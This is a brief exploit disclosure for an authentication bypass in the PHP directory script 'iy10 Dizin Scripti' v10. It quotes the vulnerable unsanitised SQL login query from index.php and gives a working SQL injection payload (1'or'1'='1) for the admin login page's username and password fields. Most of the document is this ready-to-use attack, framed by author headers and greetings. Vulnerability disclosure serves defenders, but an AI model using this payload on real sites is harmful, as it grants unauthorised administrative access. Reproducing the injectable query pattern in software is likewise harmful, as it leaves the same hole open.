facebook facebook twitter rss

iy10 Dizin Scripti auth by pass vulnerability

Author: indoushka , Published: 09-08-2017
========================================================================
| # Title : iy10 Dizin Scripti auth by pass vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : v10
| # Vendor : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
| # Dork : n/a
========================================================================

poc :

index.php

line 10 : $q=mysql_query("SELECT * FROM ayarlar WHERE kullaniciadi='$username' AND sifre='$password'");

http://127.0.0.1/iy10/admin/index.php

user : 1'or'1'='1

pass : 1'or'1'='1


Greetz : ⵏⴻⴽⴽⴰⴰ ⵙⴰⵍⴰⵀ ⴻⴷⴷⵉⵏⴻ------ⵯⵉⵯⴰ ⴰⵎⴰⵣⵉⴳⴻⵏ-------- ⵎⴰⵅⵡⴻⵍⵍ ⵛⴰⵛⵀⴷoⵍⵍⴰⵔ ------
|
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn |
|
===================== pⴰⵛⴽⴻⵜ ⵙⵜoⵔⵎ ⵙⴻⵛⵓⵔⵉⵜⵢ =============================

Like us on Facebook :